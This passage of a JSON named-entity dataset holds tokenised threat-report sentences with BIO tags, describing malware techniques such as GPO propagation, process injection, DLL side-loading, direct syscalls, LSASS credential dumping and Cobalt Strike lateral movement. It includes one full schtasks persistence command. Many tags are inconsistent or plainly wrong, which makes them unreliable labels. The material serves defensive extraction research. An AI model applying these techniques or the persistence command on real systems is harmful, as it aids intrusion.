"creating", - "immediate", - "tasks", - "through", - "GPO." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "abused", - "group", - "policy", - "objects", - "(GPO)", - "to", - "install", - "loaders" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Propagation", - "through", - "GPO" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "will", - "submit", - "immediate", - "tasks", - "to", - "the", - "hosts", - "in", - "the", - "domain", - "through", - "GPO" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "the", - "hosts", - "receive", - "the", - "task", - "through", - "GPO" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usually", - "compile", - "all", - "necessary", - "libraries", - "in", - "a", - "single", - "binary,", - "making", - "malware", - "classification", - "more", - "difficult", - "for", - "analysts", - "and", - "resulting", - "in", - "a", - "large", - "binary" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "victim", - "opens", - "the", - "document," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injecting", - "the", - "shellcode", - "into", - "rundll32.exe" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Shellcode", - "which", - "is", - "used", - "for", - "code", - "injection" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "proxy" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "create", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "create", - "a", - "ImmediateTask" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "API" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "APIs" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor", - "is", - "a", - "basic", - "remote", - "shell" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "forcing", - "its", - "component", - "SmadAVprotect32.exe", - "to", - "side-load", - "their", - "malicious", - "DLL." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "starts", - "a", - "function", - "called", - "bypassSMADAV" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "with", - "the", - "API", - "function", - "IsWindowVisible." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "by", - "IsWindowVisible", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "calling", - "the", - "RegisterClass", - "function", - "prior", - "to", - "calling", - "CreateWindow." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Before", - "a", - "call", - "to", - "CreateWindowEx,", - "you", - "would", - "usually", - "first", - "need", - "to", - "create", - "a", - "class", - "by", - "calling", - "RegisterClass", - "and", - "then", - "class", - "CreateWindowEx." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "malware", - "creates", - "2", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "schtasks", - "/Create", - "/TN", - "test", - "/SC", - "MINUTE", - "/MO", - "15", - "/TR" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "creates", - "a", - "scheduled", - "task", - "to", - "execute", - "its", - "copy", - "from", - "this", - "randomized", - "path:", - "schtasks", - "/Create", - "/TN", - "8NaZrCq3pGeDRXKF", - "/SC", - "MINUTE", - "/MO", - "15", - "/TR", - "\"explorer.exe", - "c:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\"", - "/f" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-Idus", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "final", - "payload", - "returned", - "is", - "a", - "lightweight", - "PowerShell", - "backdoor," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "It", - "then", - "picks", - "one", - "random", - "C&C", - "URL", - "out", - "of", - "the", - "three", - "available", - "and", - "constructs", - "a", - "GET", - "request" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "them", - "back", - "to", - "the", - "server", - "in", - "POST", - "request:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "the", - "validation", - "of", - "the", - "JSON", - "and", - "Base64", - "decoding" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "by", - "various", - "actors", - "to", - "disable", - "endpoint", - "protection", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "techniques", - "like", - "process", - "hollowing", - "where", - "the", - "process", - "is", - "created", - "in", - "suspend", - "mode", - "and", - "then", - "replaced", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "current", - "system", - "username" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "current", - "username", - "home", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "system’s", - "network", - "interfaces", - "(name,", - "MacAddress,", - "description)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "was", - "deployed", - "using", - "DLL", - "side-loading" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "due", - "to", - "DLL", - "side-loading,", - "the", - "loader/injector", - "winutils.dll", - "is", - "loaded", - "into", - "memory", - "and", - "runs", - "in", - "the", - "context" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "abused", - "to", - "side-load" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Packed", - "Rorschach", - "loader", - "and", - "injector" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "initial", - "loader/injector", - "winutils.dll", - "is", - "protected", - "with", - "UPX-style", - "packing" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "unpacking,", - "the", - "sample", - "loads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "and", - "injected" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "decrypts", - "config" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "into", - "notepad.exe,", - "where", - "the", - "ransomware", - "logic", - "begins." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "injected", - "into", - "notepad.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Disable", - "the", - "Windows", - "firewall,", - "using", - "netsh.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "When", - "executed", - "on", - "a", - "Windows", - "Domain", - "Controller", - "(DC),", - "the", - "ransomware", - "automatically", - "creates", - "a", - "Group", - "Policy,", - "spreading", - "itself", - "to", - "other", - "machines", - "within", - "the", - "domain." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "group", - "policy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "another", - "group", - "policy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "another", - "group", - "policy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deletes", - "them", - "from", - "the", - "original", - "location." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "schedule", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "registers", - "a", - "scheduled", - "task", - "which", - "runs", - "immediately", - "and", - "upon", - "user", - "logon," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "finds", - "the", - "relevant", - "syscall", - "numbers", - "for", - "NT", - "APIs," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "with", - "the", - "syscall", - "instruction" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "first", - "creates", - "a", - "syscall", - "table", - "for", - "NT", - "APIs" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creation", - "of", - "syscall", - "table", - "for", - "certain", - "NT", - "APIs." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "makes", - "direct", - "system", - "calls", - "using", - "the", - "“syscall”", - "instruction." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Example", - "use", - "of", - "direct", - "syscall." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "It", - "uses", - "GetSystemDefaultUILanguage", - "and", - "GetUserDefaultUILanguage", - "to" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "WinAPI", - "CryptGenRandom", - "is", - "utilized" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "implemented", - "via", - "NtSetInformationFile", - "using", - "FileInformationClass", - "FileRenameInformation," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Command", - "Line", - "Arguments" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "list", - "of", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "code", - "is", - "protected", - "and", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "obfuscated", - "process" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reusing", - "multiple", - "code", - "chunks", - "from", - "DEP-allowed", - "memory", - "pages,", - "called", - "ROP", - "gadgets." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ROP-based", - "attacks", - "execute", - "“RET”", - "instructions", - "without", - "a", - "prior", - "“CALL”", - "instruction,", - "the", - "running", - "thread’s", - "stack", - "and", - "the", - "shadow", - "stack", - "values", - "mismatch" - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "call", - "other", - "vfgadgets", - "that", - "are", - "responsible", - "for", - "executing", - "specific", - "operations,", - "like", - "Argument", - "LoadersInvokers", - "and", - "Collectors." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Collectors", - "are", - "gadgets", - "that", - "retrieve", - "a", - "value", - "already", - "present", - "in", - "a", - "register,", - "and", - "save", - "it", - "back", - "into", - "the", - "attacker’s", - "counterfeit", - "object" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "leaked", - "the", - "stack", - "pointer", - "and", - "retrieved", - "the", - "this", - "pointer", - "as", - "a", - "static", - "offset", - "from", - "the", - "stack." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "vfgadget", - "address," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "prepare", - "the", - "address", - "of", - "the", - "Windows", - "API", - "we", - "want", - "to", - "invoke", - "along", - "with", - "its", - "arguments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Windows", - "API", - "address", - "and", - "its", - "arguments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "invoke", - "any", - "API", - "we", - "like," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "began", - "sending", - "spam", - "emails,", - "mailing", - "new", - "malicious", - "attachments", - "to", - "continue", - "spreading." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "discover", - "commands", - "using", - "the", - "Windows", - "utilities", - "systeminfo" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "ipconfig" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Remote", - "access", - "tools", - "were", - "used", - "for", - "command", - "and", - "control,", - "such", - "as", - "Tactical", - "RMM", - "and", - "Anydesk." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "deployed", - "Tactical", - "RMM,", - "a", - "remote", - "management", - "agent,", - "for", - "additional", - "access", - "and", - "persistence", - "in", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "accessed", - "the", - "environment", - "using", - "Tactical", - "RMM", - "to", - "deploy", - "Anydesk", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "proceeded", - "to", - "deploy", - "several", - "remote", - "management", - "tools", - "across", - "the", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tactical", - "RMM", - "is", - "a", - "remote", - "management", - "software", - "platform", - "that", - "uses", - "a", - "combination", - "of", - "agents", - "to", - "allow", - "for", - "remote", - "management", - "and", - "access", - "to", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "added", - "AnyDesk", - "to", - "the", - "same", - "server", - "running", - "Tactical", - "RMM,", - "providing", - "an", - "additional", - "means", - "of", - "access", - "prior", - "to", - "the", - "deployment", - "of", - "ransomware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "by", - "the", - "threat", - "actor", - "for", - "the", - "remote", - "management", - "of", - "Tactical", - "RMM", - "Agent." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "this", - "RMM", - "agent", - "they", - "proceeded", - "to", - "install", - "AnyDesk", - "on", - "the", - "host." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tactical", - "RMM", - "Agent", - "was", - "installed", - "by", - "the", - "threat", - "actor", - "on", - "a", - "server", - "to", - "ensure", - "remote", - "access" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "intrusion", - "began", - "when", - "a", - "user", - "double", - "clicked", - "a", - "LNK", - "file,", - "which", - "then", - "executed", - "encoded", - "Powershell", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "The", - "Powershell", - "script,", - "when", - "double", - "clicked", - "(executed)," - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "also", - "used", - "tasklist" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Next,", - "they", - "proceeded", - "to", - "transfer", - "a", - "beacon", - "executable", - "over", - "SMB", - "to", - "the", - "remote", - "host’s", - "ProgramData", - "directory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors,", - "however,", - "proceeded", - "along", - "a", - "more", - "traditional", - "path,", - "using", - "SMB", - "file", - "transfers", - "and", - "remote", - "services", - "to", - "move", - "laterally", - "across", - "domain", - "controllers", - "and", - "several", - "other", - "servers" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "rasomware", - "deployment", - "to", - "all", - "hosts", - "over", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "files", - "transferred", - "via", - "SMB", - "as", - "SYSTEM", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "executable", - "Cobalt", - "Strike", - "beacon", - "was", - "copied", - "via", - "SMB", - "to", - "a", - "target", - "machine" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "beacon", - "was", - "then", - "successfully", - "executed", - "via", - "WMI" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "then", - "executed", - "via", - "WMI." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time" - ] - }, - { - "tokens": [ - "wmic" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "setup", - "a", - "Registry", - "Run", - "Key", - "to", - "maintain", - "persistence", - "on", - "the", - "beachhead", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "established", - "persistence", - "via", - "a", - "run", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "commands", - "to", - "download", - "an", - "Emotet", - "DLL", - "onto", - "the", - "computer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "dropped", - "Powertool64.exe", - "and", - "dontsleep.exe", - "in", - "preparation", - "for", - "their", - "final", - "actions." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "then", - "dropped", - "SoftPerfect’s", - "Network", - "Scanner" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dropped", - "and", - "executed", - "on", - "the", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "net", - "commands", - "were", - "run," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "proceeded", - "to", - "run", - "the", - "net", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "conducted", - "further", - "discovery", - "tasks", - "running", - "find.bat", - "and", - "p.bat," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "and", - "a", - "batch", - "file", - "1.bat", - "were", - "dropped", - "on", - "the", - "host", - "and", - "the", - "batch", - "file", - "was", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "two", - "batch", - "files", - "were", - "run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "first", - "find.bat", - "was", - "used", - "to", - "run" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c", - "start" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "executed", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "then", - "proceeded", - "to", - "dump", - "credentials", - "from", - "the", - "LSASS", - "process", - "on", - "the", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "‘mimikatz’", - "string", - "in", - "the", - "Netlogon", - "event", - "that", - "is", - "used", - "by", - "the", - "Mimikatz", - "Zerologon", - "implementation." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "Process", - "access", - "to", - "LSASS", - "was", - "observed,", - "likely", - "to", - "dump", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Granted", - "Access", - "level", - "matches", - "know", - "indicators", - "for", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "request", - "access", - "level", - "of", - "0x0040", - "(64)", - "to", - "LSASS,", - "as", - "well", - "indicating", - "other", - "credential", - "access", - "tools", - "may", - "have", - "been", - "in", - "use", - "by", - "the", - "threat", - "actor." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "With", - "some", - "further", - "process", - "injection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "observed", - "process", - "injecting", - "into", - "legitimate", - "process" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "from", - "a", - "process", - "that", - "was", - "injected", - "with", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Injected", - "Process", - "Name" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "processes", - "used", - "for", - "injection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "specific", - "mechanism", - "used", - "to", - "inject", - "into", - "a", - "foreign", - "process,", - "was", - "injecting", - "arbitrary", - "code", - "into", - "its", - "memory", - "space,", - "and", - "executing", - "it", - "as", - "a", - "remotely", - "created", - "thread" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "from", - "an", - "injected", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "flight", - "of", - "netlogon", - "authentications", - "were", - "observed", - "from", - "the", - "beachhead", - "host", - "to", - "the", - "domain", - "controller", - "as", - "a", - "possible", - "attempt", - "at", - "exploiting", - "the", - "domain", - "controller." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "choosing", - "a", - "new", - "server", - "and", - "connecting", - "via", - "RDP," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - 